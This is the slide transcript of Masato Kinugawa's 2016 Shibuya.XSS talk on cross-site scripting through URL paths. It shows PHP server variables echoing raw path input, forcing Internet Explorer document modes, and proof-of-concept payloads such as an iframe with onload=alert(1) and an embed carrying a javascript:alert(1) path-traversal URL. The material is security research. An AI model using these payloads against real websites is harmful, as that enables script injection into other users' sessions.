Usable Starting Tomorrow?! Techniques for XSS via the PATH / Shibuya.XSS techtalk #7
Masato Kinugawa
March 29, 2016
These are the slides for Shibuya.XSS techtalk #7.
Transcript
https://host/tags/aaa/
... </head> <body> <form> <input type="text" value="aaa"> ...

... </head> <meta property="og:url" content="https://host/path/index"> <body> ...
https://host/path/index?p=1

... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ...
https://host/path/index;aaa?p=1

http://php.net/index.php
http://php.net/index.php/xxx/yyy/zzz

http://shibuyaxss.connpass.com/event/28232/
http://shibuyaxss.connpass.com/event/28232/;abc

SCRIPT_URL /test.php/<b>PATH</b>
SCRIPT_URI http://localhost/test.php/<b>PATH</b>
PATH_INFO /<b>PATH</b>
PATH_TRANSLATED \<b>PATH<\b>
PHP_SELF /test.php/<b>PATH</b>

GET /path?query HTTP/1.1
http://php.net/manual/ja/reserved.variables.server.php

/test.php/<b>PATH</b>?<b>QUERY</b>
GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY%3C/b%3E HTTP/1.1
QUERY_STRING %3Cb%3EQUERY%3C/b%3E
REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY%3C/b%3E

http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

/test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b>
GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1
QUERY_STRING <b>QUERY</b>
REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b>
http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

http://localhost/test.php/<b>PATH</b>
GET /test.php/<b>PATH</b> HTTP/1.1

/test.php/%3Cb%3EPATH%3C/b%3E
GET /test.php/<b>PATH</b> HTTP/1.1
REQUEST_URI /test.php/<b>PATH</b>
location.pathname /test.php/%3Cb%3EPATH%3C/b%3E
http://localhost/test.php/<b>PATH</b>
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
X-UA-Compatible: IE=9
<head> <meta http-equiv="X-UA-Compatible" content="IE=9"> </head>

<svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>

ifr=document.createElement('<iframe onload=alert(1)>');
document.body.appendChild(ifr);
InvalidCharacterError

<meta http-equiv="X-UA-Compatible" content="IE=9">
<script> console.log(document.documentMode) /* 9 */ </script>
<iframe src=//victim/></iframe>
http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf

<meta http-equiv="X-UA-Compatible" content="IE=9">
<embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/%2F..%2F..%2Fjizen2#hash"></embed>

<script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>